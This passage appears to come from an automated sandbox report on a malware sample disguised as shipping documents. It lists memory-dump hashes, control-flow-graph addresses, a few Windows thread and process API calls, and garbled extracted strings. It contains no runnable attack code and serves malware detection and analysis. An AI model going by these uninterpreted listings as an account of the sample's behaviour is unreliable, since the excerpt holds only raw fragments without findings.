                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ef52c953a886d82f49eaa9d8c0aef246a92a7ecd79cd06ba717c9e6e29cdcde
                                                • Instruction ID: 2e96cd8bfe712b50f8dbd8909b0066e0b08c5040d34a67d92ef88b919cd179e3
                                                • Opcode Fuzzy Hash: 4ef52c953a886d82f49eaa9d8c0aef246a92a7ecd79cd06ba717c9e6e29cdcde
                                                • Instruction Fuzzy Hash: 6D12F235F01205DFEB14DF64D88069EB7B2EB84324F20843AD85AEB785DA34DD4ACB91
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc543a058d860333e07bd9c42b05d07572e9bfa64de9d5147b9c2e658f42feba
                                                • Instruction ID: 52812ac9fc4d84db71180e71c11ceac0667ad839c6bb794dee717d49bdbdb3d2
                                                • Opcode Fuzzy Hash: fc543a058d860333e07bd9c42b05d07572e9bfa64de9d5147b9c2e658f42feba
                                                • Instruction Fuzzy Hash: CD22A174E00209CFEB14CF6DC590B9DB7B6EB49350F608926E419EB792DA34DC8ACB51
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3746e3f03dd438c933c39e910333d29dab8afc21e6ef3a87aaf0c9ff27645e6
                                                • Instruction ID: 25a664c7075f026a68a448d8a96e8afcfc54bbb5dd31bc014c08e06757c41489
                                                • Opcode Fuzzy Hash: a3746e3f03dd438c933c39e910333d29dab8afc21e6ef3a87aaf0c9ff27645e6
                                                • Instruction Fuzzy Hash: D4D19E34A001058FDB18DFA8D994AADB7B2FF88314F648529E406EB365DB35DC56CF82
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9005718ba06e7ee970f061c101449e2d34b81474a9c1bfa33957cbc6bb14e00c
                                                • Instruction ID: 439745c52aacf8377c1d0ed953fa1deaa829092e1cb039e932114973b9038d38
                                                • Opcode Fuzzy Hash: 9005718ba06e7ee970f061c101449e2d34b81474a9c1bfa33957cbc6bb14e00c
                                                • Instruction Fuzzy Hash: 8BB14B70E00209CFDF14CFA9CD957ADBBF2AF88714F148129D819A7394EB7498A5CB85
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd4593110bb0a44f5afedc4da9f9adfb6e4361879cb961c9273f782d690b760d
                                                • Instruction ID: 1ff94b49422a9336a2bf9279a1583ba74e4c845d9e40c640fc425ac102715989
                                                • Opcode Fuzzy Hash: dd4593110bb0a44f5afedc4da9f9adfb6e4361879cb961c9273f782d690b760d
                                                • Instruction Fuzzy Hash: D7918D70E00209DFDF14CFA9CD857EEBBF2AF88304F148129E415A7294EB749996CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 527 388dad98-388dadb6 529 388dadb8-388dadbb 527->529 530 388dadbd-388dadd9 529->530 531 388dadde-388dade1 529->531 530->531 532 388dadf5-388dadf8 531->532 533 388dade3-388dadf0 531->533 534 388dadfe-388dae01 532->534 535 388dafb5-388dafbe 532->535 533->532 538 388dae1b-388dae1e 534->538 539 388dae03-388dae0c 534->539 535->539 540 388dafc4-388dafce 535->540 543 388dae28-388dae2b 538->543 544 388dae20-388dae25 538->544 541 388dafcf-388dafd9 539->541 542 388dae12-388dae16 539->542 552 388dafdb-388dafdd 541->552 553 388daf73-388daf74 541->553 542->538 546 388dae2d-388dae31 543->546 547 388dae3c-388dae3f 543->547 544->543 546->540 549 388dae37 546->549 550 388dae4f-388dae52 547->550 551 388dae41-388dae4a 547->551 549->547 554 388dae6c-388dae6e 550->554 555 388dae54-388dae67 550->555 551->550 558 388dafdf-388db006 552->558 559 388daf77-388daf79 552->559 560 388daf5e-388daf62 553->560 561 388daf75-388daf76 553->561 556 388dae75-388dae78 554->556 557 388dae70 554->557 555->554 556->529 563 388dae7e-388daea2 556->563 557->556 564 388db008-388db00b 558->564 562 388daf7a-388dafab 559->562 560->562 565 388daf64-388daf6a 560->565 561->559 587 388dafb2 562->587 586 388daea8-388daeb7 563->586 563->587 568 388db00d-388db017 564->568 569 388db018-388db01b 564->569 570 388daf6c 565->570 571 388daf6e-388daf70 565->571 574 388db01d call 388db2f0 569->574 575 388db02a-388db02d 569->575 570->562 571->553 582 388db023-388db025 574->582 576 388db02f-388db04b 575->576 577 388db050-388db053 575->577 576->577 578 388db055-388db059 577->578 579 388db060-388db063 577->579 583 388db069-388db0a4 578->583 584 388db05b 578->584 579->583 585 388db2cc-388db2ce 579->585 582->575 596 388db0aa-388db0b6 583->596 597 388db297-388db2aa 583->597 584->579 590 388db2d5-388db2d8 585->590 591 388db2d0 585->591 599 388daecf-388daf0a call 388d6670 586->599 600 388daeb9-388daebf 586->600 587->535 590->564 595 388db2de-388db2e8 590->595 591->590 608 388db0b8-388db0d1 596->608 609 388db0d6-388db11a 596->609 601 388db2ac 597->601 619 388daf0c-388daf12 599->619 620 388daf22-388daf39 599->620 602 388daec1 600->602 603 388daec3-388daec5 600->603 607 388db2ad 601->607 602->599 603->599 607->607 608->601 625 388db11c-388db12e 609->625 626 388db136-388db175 609->626 621 388daf14 619->621 622 388daf16-388daf18 619->622 628 388daf3b-388daf41 620->628 629 388daf51-388daf59 620->629 621->620 622->620 625->626 632 388db25c-388db271 626->632 633 388db17b-388db256 call 388d6670 626->633 634 388daf45-388daf47 628->634 635 388daf43 628->635 629->560 632->597 633->632 634->629 635->629
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XM$XM$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3131319162
                                                • Opcode ID: b43f8d53ec56a611b139261d5d6892862eb54dbe4352b9402993a85768412e12
                                                • Instruction ID: a0f7c7a9f85a832acd7bcc2836930edef73d47550896a7f312df87c8ce4ca6c1
                                                • Opcode Fuzzy Hash: b43f8d53ec56a611b139261d5d6892862eb54dbe4352b9402993a85768412e12
                                                • Instruction Fuzzy Hash: 86E18F74A00209CFDB19DF68D89069EB7B6FF84304F608629D419EB355DB35EC4ACB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3723351465
                                                • Opcode ID: fbb104f5edaea8ef449d340f453b9d2d8dc6502eb8e66c6b06e5abb40b435d1e
                                                • Instruction ID: a1c4a079cd58a8c240da40fa345ed22c886993c229f44965298ad667a5f34af9
                                                • Opcode Fuzzy Hash: fbb104f5edaea8ef449d340f453b9d2d8dc6502eb8e66c6b06e5abb40b435d1e
                                                • Instruction Fuzzy Hash: BA026C74A00209DFEB14CF6DC580A9DB7B2FF85354F20892AD419EB651DB34DD8ACB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 963 37fe320c-37fe329f GetCurrentProcess 968 37fe32a8-37fe32dc GetCurrentThread 963->968 969 37fe32a1-37fe32a7 963->969 970 37fe32de-37fe32e4 968->970 971 37fe32e5-37fe3319 GetCurrentProcess 968->971 969->968 970->971 973 37fe331b-37fe3321 971->973 974 37fe3322-37fe333d call 37fe33e1 971->974 973->974 977 37fe3343-37fe3372 GetCurrentThreadId 974->977 978 37fe337b-37fe33dd 977->978 979 37fe3374-37fe337a 977->979 979->978
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 37FE328E
                                                • GetCurrentThread.KERNEL32 ref: 37FE32CB
                                                • GetCurrentProcess.KERNEL32 ref: 37FE3308
                                                • GetCurrentThreadId.KERNEL32 ref: 37FE3361
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 18ac75e27e8f8005f38c6e243038fe5179570d5c34f917d4f06c0810966e9b87
                                                • Instruction ID: 1239e18fd3570af9e54b053dcecda5c6c0ce49465721ae87511c1f425e00419b
                                                • Opcode Fuzzy Hash: 18ac75e27e8f8005f38c6e243038fe5179570d5c34f917d4f06c0810966e9b87
                                                • Instruction Fuzzy Hash: BA5158B09002499FDB04DFAAC548BEEBBF5FF88310F248859D019A7361DB39A940CF65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 986 37fe3210-37fe329f GetCurrentProcess 990 37fe32a8-37fe32dc GetCurrentThread 986->990 991 37fe32a1-37fe32a7 986->991 992 37fe32de-37fe32e4 990->992 993 37fe32e5-37fe3319 GetCurrentProcess 990->993 991->990 992->993 995 37fe331b-37fe3321 993->995 996 37fe3322-37fe333d call 37fe33e1 993->996 995->996 999 37fe3343-37fe3372 GetCurrentThreadId 996->999 1000 37fe337b-37fe33dd 999->1000 1001 37fe3374-37fe337a 999->1001 1001->1000
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 37FE328E
                                                • GetCurrentThread.KERNEL32 ref: 37FE32CB
                                                • GetCurrentProcess.KERNEL32 ref: 37FE3308
                                                • GetCurrentThreadId.KERNEL32 ref: 37FE3361
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3324753257.0000000037FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_37fe0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 76cdd72f563371837edb952a66b9fe7e8f2ae100584ea5749a6a7a469fba11c5
                                                • Instruction ID: 2990d36025a5f5d8827268f19751a7971419ee9f00d4acc0ce36e8cceeee4f48
                                                • Opcode Fuzzy Hash: 76cdd72f563371837edb952a66b9fe7e8f2ae100584ea5749a6a7a469fba11c5
                                                • Instruction Fuzzy Hash: 8F5147B09002499FDB14DFAAD548BEEBBF5FF88310F248859D019A7361DB39A940CF65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1008 388d9210-388d9235 1009 388d9237-388d923a 1008->1009 1010 388d923c-388d925b 1009->1010 1011 388d9260-388d9263 1009->1011 1010->1011 1012 388d9269-388d927e 1011->1012 1013 388d9b23-388d9b25 1011->1013 1020 388d9296-388d92ac 1012->1020 1021 388d9280-388d9286 1012->1021 1015 388d9b2c-388d9b2f 1013->1015 1016 388d9b27 1013->1016 1015->1009 1018 388d9b35-388d9b3f 1015->1018 1016->1015 1025 388d92b7-388d92b9 1020->1025 1022 388d9288 1021->1022 1023 388d928a-388d928c 1021->1023 1022->1020 1023->1020 1026 388d92bb-388d92c1 1025->1026 1027 388d92d1-388d9342 1025->1027 1028 388d92c5-388d92c7 1026->1028 1029 388d92c3 1026->1029 1038 388d936e-388d938a 1027->1038 1039 388d9344-388d9367 1027->1039 1028->1027 1029->1027 1044 388d938c-388d93af 1038->1044 1045 388d93b6-388d93d1 1038->1045 1039->1038 1044->1045 1050 388d93fc-388d9417 1045->1050 1051 388d93d3-388d93f5 1045->1051 1056 388d9419-388d943b 1050->1056 1057 388d9442-388d944c 1050->1057 1051->1050 1056->1057 1058 388d945c-388d94d6 1057->1058 1059 388d944e-388d9457 1057->1059 1065 388d94d8-388d94f6 1058->1065 1066 388d9523-388d9538 1058->1066 1059->1018 1070 388d94f8-388d9507 1065->1070 1071 388d9512-388d9521 1065->1071 1066->1013 1070->1071 1071->1065 1071->1066
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q
                                                • API String ID: 0-858218434
                                                • Opcode ID: 9f615d149b3cb4fa4e82327e7ef8cf9e663c506784c0d710e6e2b502fc0131c4
                                                • Instruction ID: c0dd55872a222306390c822bfb299ac83be6717c8441ff9cb66d1d136d8fe5fd
                                                • Opcode Fuzzy Hash: 9f615d149b3cb4fa4e82327e7ef8cf9e663c506784c0d710e6e2b502fc0131c4
                                                • Instruction Fuzzy Hash: FA915E34B0020A8FDB55DF65C850BAEB3F7BF88244F508569C919EB354EA70AD478B92

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1074 169038-169063 1076 169065-169068 1074->1076 1077 1690cc-1690cf 1076->1077 1078 16906a-1690c7 1076->1078 1079 169133-169136 1077->1079 1080 1690d1-16912e 1077->1080 1078->1077 1082 16919a-16919d 1079->1082 1083 169138-169195 1079->1083 1080->1079 1085 169201-169204 1082->1085 1086 16919f-1691b0 1082->1086 1083->1082 1087 169206-169269 1085->1087 1088 16926e-169271 1085->1088 1094 1691bb-1691fc 1086->1094 1087->1088 1091 1692d5-1692d8 1088->1091 1092 169273-1692d0 1088->1092 1097 16933c-16933f 1091->1097 1098 1692da-169337 1091->1098 1092->1091 1094->1085 1102 1693a3-1693a6 1097->1102 1103 169341-16939e 1097->1103 1098->1097 1106 169401-169404 1102->1106 1107 1693a8-1693fc 1102->1107 1103->1102 1111 169456-169459 1106->1111 1112 169406-169451 1106->1112 1107->1106 1121 1694ab-1694ae 1111->1121 1122 16945b-1694a6 1111->1122 1112->1111 1127 169500-169503 1121->1127 1128 1694b0-1694fb 1121->1128 1122->1121 1133 169555-169558 1127->1133 1134 169505-169550 1127->1134 1128->1127 1139 1695aa-1695ad 1133->1139 1140 16955a-1695a5 1133->1140 1134->1133 1149 1695ff-169602 1139->1149 1150 1695af-1695fa 1139->1150 1140->1139 1155 169654-169657 1149->1155 1156 169604-16964f 1149->1156 1150->1149 1163 1696a9-1696ac 1155->1163 1164 169659-1696a4 1155->1164 1156->1155 1167 1696fe-169701 1163->1167 1168 1696ae-1696f9 1163->1168 1164->1163 1176 169753-169756 1167->1176 1177 169703-16974e 1167->1177 1168->1167 1186 1697b1-1697b4 1176->1186 1187 169758-1697ac 1176->1187 1177->1176 1189 1697b6-169813 1186->1189 1190 169818-16981b 1186->1190 1187->1186 1189->1190 1198 16987f-169882 1190->1198 1199 16981d-16987a 1190->1199 1207 1698e6-1698e9 1198->1207 1208 169884-1698e1 1198->1208 1199->1198 1210 16994d-169950 1207->1210 1211 1698eb-169948 1207->1211 1208->1207 1219 1699b4-1699b7 1210->1219 1220 169952-1699af 1210->1220 1211->1210 1223 169a15-169a18 1219->1223 1224 1699b9-169a10 1219->1224 1220->1219 1232 169a70-169a73 1223->1232 1233 169a1a-169a6b 1223->1233 1224->1223 1242 169a75-169ac6 1232->1242 1243 169acb-169ace 1232->1243 1233->1232 1242->1243 1245 169b26-169b29 1243->1245 1246 169ad0-169b21 1243->1246 1254 169b81-169b84 1245->1254 1255 169b2b-169b7c 1245->1255 1246->1245 1263 169b86-169bd7 1254->1263 1264 169bdc-169bdf 1254->1264 1255->1254 1263->1264 1266 169c37-169c3a 1264->1266 1267 169be1-169c32 1264->1267 1275 169c92-169c95 1266->1275 1276 169c3c-169c8d 1266->1276 1267->1266 1279 169c97-169ce8 1275->1279 1280 169ced-169cf0 1275->1280 1276->1275 1279->1280 1288 169cf2-169d43 1280->1288 1289 169d48-169d4b 1280->1289 1288->1289 1298 169da3-169da6 1289->1298 1299 169d4d-169d9e 1289->1299 1301 169dfe-169e01 1298->1301 1302 169da8-169df9 1298->1302 1299->1298 1310 169e03-169e54 1301->1310 1311 169e59-169e5c 1301->1311 1302->1301 1310->1311 1319 169eb4-169eb7 1311->1319 1320 169e5e-169eaf 1311->1320 1322 169f0f-169f11 1319->1322 1323 169eb9-169f0a 1319->1323 1320->1319 1331 169f13 1322->1331 1332 169f18-169f1b 1322->1332 1323->1322 1331->1332 1332->1076 1339 169f21-169f28 1332->1339
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Qv5,Rv5PRv5`Ay5$[v5$^v5
                                                • API String ID: 0-3177103823
                                                • Opcode ID: 3c74093c0954d574f7bc7e89bee7f47b34cf7106aa692e719c7987aaae778190
                                                • Instruction ID: 4b707bb9a775a7d4b844194a01db4541b22f33c7d1846699450cfec5879edce1
                                                • Opcode Fuzzy Hash: 3c74093c0954d574f7bc7e89bee7f47b34cf7106aa692e719c7987aaae778190
                                                • Instruction Fuzzy Hash: 99824974B002049FDB18EB24C991A6DB7A3EB8C714F50826ADA1AF7350DB35AC83CF55

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1361 169048-169063 1362 169065-169068 1361->1362 1363 1690cc-1690cf 1362->1363 1364 16906a-1690c7 1362->1364 1365 169133-169136 1363->1365 1366 1690d1-16912e 1363->1366 1364->1363 1368 16919a-16919d 1365->1368 1369 169138-169195 1365->1369 1366->1365 1371 169201-169204 1368->1371 1372 16919f-1691b0 1368->1372 1369->1368 1373 169206-169269 1371->1373 1374 16926e-169271 1371->1374 1380 1691bb-1691fc 1372->1380 1373->1374 1377 1692d5-1692d8 1374->1377 1378 169273-1692d0 1374->1378 1383 16933c-16933f 1377->1383 1384 1692da-169337 1377->1384 1378->1377 1380->1371 1388 1693a3-1693a6 1383->1388 1389 169341-16939e 1383->1389 1384->1383 1392 169401-169404 1388->1392 1393 1693a8-1693fc 1388->1393 1389->1388 1397 169456-169459 1392->1397 1398 169406-169451 1392->1398 1393->1392 1407 1694ab-1694ae 1397->1407 1408 16945b-1694a6 1397->1408 1398->1397 1413 169500-169503 1407->1413 1414 1694b0-1694fb 1407->1414 1408->1407 1419 169555-169558 1413->1419 1420 169505-169550 1413->1420 1414->1413 1425 1695aa-1695ad 1419->1425 1426 16955a-1695a5 1419->1426 1420->1419 1435 1695ff-169602 1425->1435 1436 1695af-1695fa 1425->1436 1426->1425 1441 169654-169657 1435->1441 1442 169604-16964f 1435->1442 1436->1435 1449 1696a9-1696ac 1441->1449 1450 169659-1696a4 1441->1450 1442->1441 1453 1696fe-169701 1449->1453 1454 1696ae-1696f9 1449->1454 1450->1449 1462 169753-169756 1453->1462 1463 169703-16974e 1453->1463 1454->1453 1472 1697b1-1697b4 1462->1472 1473 169758-1697ac 1462->1473 1463->1462 1475 1697b6-169813 1472->1475 1476 169818-16981b 1472->1476 1473->1472 1475->1476 1484 16987f-169882 1476->1484 1485 16981d-16987a 1476->1485 1493 1698e6-1698e9 1484->1493 1494 169884-1698e1 1484->1494 1485->1484 1496 16994d-169950 1493->1496 1497 1698eb-169948 1493->1497 1494->1493 1505 1699b4-1699b7 1496->1505 1506 169952-1699af 1496->1506 1497->1496 1509 169a15-169a18 1505->1509 1510 1699b9-169a10 1505->1510 1506->1505 1518 169a70-169a73 1509->1518 1519 169a1a-169a6b 1509->1519 1510->1509 1528 169a75-169ac6 1518->1528 1529 169acb-169ace 1518->1529 1519->1518 1528->1529 1531 169b26-169b29 1529->1531 1532 169ad0-169b21 1529->1532 1540 169b81-169b84 1531->1540 1541 169b2b-169b7c 1531->1541 1532->1531 1549 169b86-169bd7 1540->1549 1550 169bdc-169bdf 1540->1550 1541->1540 1549->1550 1552 169c37-169c3a 1550->1552 1553 169be1-169c32 1550->1553 1561 169c92-169c95 1552->1561 1562 169c3c-169c8d 1552->1562 1553->1552 1565 169c97-169ce8 1561->1565 1566 169ced-169cf0 1561->1566 1562->1561 1565->1566 1574 169cf2-169d43 1566->1574 1575 169d48-169d4b 1566->1575 1574->1575 1584 169da3-169da6 1575->1584 1585 169d4d-169d9e 1575->1585 1587 169dfe-169e01 1584->1587 1588 169da8-169df9 1584->1588 1585->1584 1596 169e03-169e54 1587->1596 1597 169e59-169e5c 1587->1597 1588->1587 1596->1597 1605 169eb4-169eb7 1597->1605 1606 169e5e-169eaf 1597->1606 1608 169f0f-169f11 1605->1608 1609 169eb9-169f0a 1605->1609 1606->1605 1617 169f13 1608->1617 1618 169f18-169f1b 1608->1618 1609->1608 1617->1618 1618->1362 1625 169f21-169f28 1618->1625
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Qv5,Rv5PRv5`Ay5$[v5$^v5
                                                • API String ID: 0-3177103823
                                                • Opcode ID: 1707fb263465ff4a1e7109aeedb2666f42c88c3a7c06ea2cffec510d61f73b8a
                                                • Instruction ID: 469692cd05ca7a5412c4d57e077b0ddb33c79f73c71d141dbe8b6d8164da6e9b
                                                • Opcode Fuzzy Hash: 1707fb263465ff4a1e7109aeedb2666f42c88c3a7c06ea2cffec510d61f73b8a
                                                • Instruction Fuzzy Hash: 5D824974B002049FDB18EB24C991A6DB7A3EB8C714F50816ADA1AF7350DB35AC83CF55

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1647 388dd008-388dd023 1648 388dd025-388dd028 1647->1648 1649 388dd02a-388dd06c 1648->1649 1650 388dd071-388dd074 1648->1650 1649->1650 1651 388dd0bd-388dd0c0 1650->1651 1652 388dd076-388dd0b8 1650->1652 1654 388dd0cf-388dd0d2 1651->1654 1655 388dd0c2-388dd0c4 1651->1655 1652->1651 1658 388dd11b-388dd11e 1654->1658 1659 388dd0d4-388dd0e3 1654->1659 1656 388dd3af-388dd3b8 1655->1656 1657 388dd0ca 1655->1657 1664 388dd3ba-388dd3bf 1656->1664 1665 388dd3c7-388dd3d3 1656->1665 1657->1654 1661 388dd167-388dd16a 1658->1661 1662 388dd120-388dd162 1658->1662 1666 388dd0e5-388dd0ea 1659->1666 1667 388dd0f2-388dd0fe 1659->1667 1670 388dd16c-388dd171 1661->1670 1671 388dd174-388dd177 1661->1671 1662->1661 1664->1665 1668 388dd3d9-388dd3ed 1665->1668 1669 388dd4e4-388dd4e9 1665->1669 1666->1667 1672 388dda25-388dda3a 1667->1672 1673 388dd104-388dd116 1667->1673 1692 388dd4f1 1668->1692 1693 388dd3f3-388dd405 1668->1693 1669->1692 1670->1671 1677 388dd179-388dd1bb 1671->1677 1678 388dd1c0-388dd1c3 1671->1678 1691 388dda3b-388dda3c 1672->1691 1673->1658 1677->1678 1683 388dd1c5-388dd1db 1678->1683 1684 388dd1e0-388dd1e3 1678->1684 1683->1684 1687 388dd22c-388dd22f 1684->1687 1688 388dd1e5-388dd227 1684->1688 1695 388dd4f4-388dd500 1687->1695 1697 388dd235-388dd238 1687->1697 1688->1687 1691->1691 1696 388dda3e-388dda5e 1691->1696 1692->1695 1713 388dd429-388dd42b 1693->1713 1714 388dd407-388dd40d 1693->1714 1695->1659 1703 388dd506-388dd7f3 1695->1703 1704 388dda60-388dda63 1696->1704 1705 388dd23a-388dd27c 1697->1705 1706 388dd281-388dd284 1697->1706 1861 388dd7f9-388dd7ff 1703->1861 1862 388dda1a-388dda24 1703->1862 1711 388dda65 call 388ddb7d 1704->1711 1712 388dda72-388dda75 1704->1712 1705->1706 1709 388dd2cd-388dd2d0 1706->1709 1710 388dd286-388dd2c8 1706->1710 1719 388dd2f3-388dd2f6 1709->1719 1720 388dd2d2-388dd2ee 1709->1720 1710->1709 1734 388dda6b-388dda6d 1711->1734 1716 388dda98-388dda9b 1712->1716 1717 388dda77-388dda93 1712->1717 1732 388dd435-388dd441 1713->1732 1723 388dd40f 1714->1723 1724 388dd411-388dd41d 1714->1724 1727 388dda9d-388ddac9 1716->1727 1728 388ddace-388ddad0 1716->1728 1717->1716 1729 388dd33f-388dd342 1719->1729 1730 388dd2f8-388dd33a 1719->1730 1720->1719 1731 388dd41f-388dd427 1723->1731 1724->1731 1727->1728 1738 388ddad7-388ddada 1728->1738 1739 388ddad2 1728->1739 1744 388dd344-388dd346 1729->1744 1745 388dd351-388dd354 1729->1745 1730->1729 1731->1732 1765 388dd44f 1732->1765 1766 388dd443-388dd44d 1732->1766 1734->1712 1738->1704 1747 388ddadc-388ddaeb 1738->1747 1739->1738 1744->1692 1750 388dd34c 1744->1750 1751 388dd39d-388dd39f 1745->1751 1752 388dd356-388dd365 1745->1752 1774 388ddaed-388ddb50 call 388d6670 1747->1774 1775 388ddb52-388ddb67 1747->1775 1750->1745 1756 388dd3a6-388dd3a9 1751->1756 1757 388dd3a1 1751->1757 1763 388dd374-388dd380 1752->1763 1764 388dd367-388dd36c 1752->1764 1756->1648 1756->1656 1757->1756 1763->1672 1771 388dd386-388dd398 1763->1771 1764->1763 1770 388dd454-388dd456 1765->1770 1766->1770 1770->1692 1777 388dd45c-388dd478 call 388d6670 1770->1777 1771->1751 1774->1775 1793 388dd47a-388dd47f 1777->1793 1794 388dd487-388dd493 1777->1794 1793->1794 1794->1669 1796 388dd495-388dd4e2 1794->1796 1796->1692 1863 388dd80e-388dd817 1861->1863 1864 388dd801-388dd806 1861->1864 1863->1672 1865 388dd81d-388dd830 1863->1865 1864->1863 1867 388dda0a-388dda14 1865->1867 1868 388dd836-388dd83c 1865->1868 1867->1861 1867->1862 1869 388dd83e-388dd843 1868->1869 1870 388dd84b-388dd854 1868->1870 1869->1870 1870->1672 1871 388dd85a-388dd87b 1870->1871 1874 388dd87d-388dd882 1871->1874 1875 388dd88a-388dd893 1871->1875 1874->1875 1875->1672 1876 388dd899-388dd8b6 1875->1876 1876->1867 1879 388dd8bc-388dd8c2 1876->1879 1879->1672 1880 388dd8c8-388dd8e1 1879->1880 1882 388dd9fd-388dda04 1880->1882 1883 388dd8e7-388dd90e 1880->1883 1882->1867 1882->1879 1883->1672 1886 388dd914-388dd91e 1883->1886 1886->1672 1887 388dd924-388dd93b 1886->1887 1889 388dd93d-388dd948 1887->1889 1890 388dd94a-388dd965 1887->1890 1889->1890 1890->1882 1895 388dd96b-388dd984 call 388d6670 1890->1895 1899 388dd986-388dd98b 1895->1899 1900 388dd993-388dd99c 1895->1900 1899->1900 1900->1672 1901 388dd9a2-388dd9f6 1900->1901 1901->1882
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q
                                                • API String ID: 0-182748909
                                                • Opcode ID: f6a58b049c7816f2a273957da75fd892eadaefd7ce078bfba3c0d8d564a0dbeb
                                                • Instruction ID: 0ee823d45e34a15aefd4c4cf9f7fb79f9417e12cf03f835882e1b36153abfbc9
                                                • Opcode Fuzzy Hash: f6a58b049c7816f2a273957da75fd892eadaefd7ce078bfba3c0d8d564a0dbeb
                                                • Instruction Fuzzy Hash: 5E622C3060020ACFDB15DF68D590A4DB7B6FF84344B608A29D41AEF269DB75ED4BCB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
